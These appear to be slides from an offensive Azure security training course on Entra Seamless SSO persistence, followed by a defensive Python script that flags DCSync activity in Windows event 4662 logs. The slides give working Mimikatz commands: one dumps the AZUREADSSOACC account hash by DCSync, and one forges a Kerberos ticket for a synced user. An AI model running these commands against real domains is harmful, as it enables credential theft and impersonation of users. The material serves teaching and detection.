Seamless SSO
Entra Seamless SSO automatically signs users in when they are on an on-prem domain-joined machine. There is no need to use passwords to log in to Entra ID and on-prem applications.

• Supported by both PHS and PTA.
• When Seamless SSO is enabled, a computer account AZUREADSSOACC is created in the on-prem AD. This account's Kerberos decryption key is shared with Entra ID.
• Entra ID exposes an endpoint (https://autologon.microsoftazuread-sso.com) that accepts Kerberos tickets. The domain-joined machine's browser forwards the tickets to this endpoint for SSO.

Attacking Azure © Altered Security. All rights reserved 227

Persistence - AZUREADSSOACC - On-Prem to Cloud

• Password/key of the AZUREADSSOACC never changes.
• If we can compromise the NTLM hash of the AZUREADSSOACC machine account, we can create Silver Tickets for any synced on-prem user!

Invoke-Mimikatz -Command '"lsadump::dcsync /user:defeng\azureadssoacc$ /domain:defeng.corp /dc:defeng-dc.defeng.corp"'

• We just need the userPrincipalName and SID of the user to create the Silver Ticket, which can be used from any machine connected to the internet.

Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin1 /sid:S-1-5-21-938785110-3291390659-577725712 /id:1108 /domain:defeng.corp /rc4:<> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'

• Our lab environment (for both PHS and PTA) uses different UPN prefixes for the on-prem and Azure domains, so the SSO will not work ;)
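A defender-side check for the DCSync step shown above (an added example, not part of the course material): it scans Windows Security event 4662 records for replication control-access rights requested by principals other than domain controllers or the Entra Connect connector account. The event records are constructed samples and the replicator names are hypothetical.

```python
import re

# Control-access-right GUIDs that a DCSync-style read requests (real, well-known values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals expected to replicate: DC computer accounts plus the Entra Connect
# connector account. Hypothetical lab names; MSOL_<id> is a placeholder.
EXPECTED_REPLICATORS = {"DEFENG-DC$", "MSOL_<id>"}

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


def find_dcsync(events):
    """Return one finding per 4662 event that requests replication rights
    from a principal not listed in EXPECTED_REPLICATORS."""
    expected = {e.upper() for e in EXPECTED_REPLICATORS}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        requested = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in requested & set(REPLICATION_RIGHTS))
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in expected:
            continue
        findings.append({
            "subject": subject,
            "object": ev.get("ObjectName", ""),
            "rights": rights,
            # A user account (no trailing $) pulling replication data is the classic DCSync pattern.
            "severity": "high" if not subject.endswith("$") else "medium",
        })
    return findings


# Constructed sample events (not real telemetry) in the shape of 4662 fields.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DEFENG-DC$", "ObjectName": "DC=defeng,DC=corp",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectName": "DC=defeng,DC=corp",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectName": "CN=AZUREADSSOACC,CN=Computers,DC=defeng,DC=corp",
     "Properties": "{deadbeef-0000-4000-8000-000000000001}"},  # constructed non-replication property GUID
]

if __name__ == "__main__":
    for finding in find_dcsync(SAMPLE_EVENTS):
        print(finding)
```

The same rule belongs in a SIEM query: 4662 with either replication GUID where the subject is neither a DC nor the connector account, and the AZUREADSSOACC object as the target deserves the highest priority.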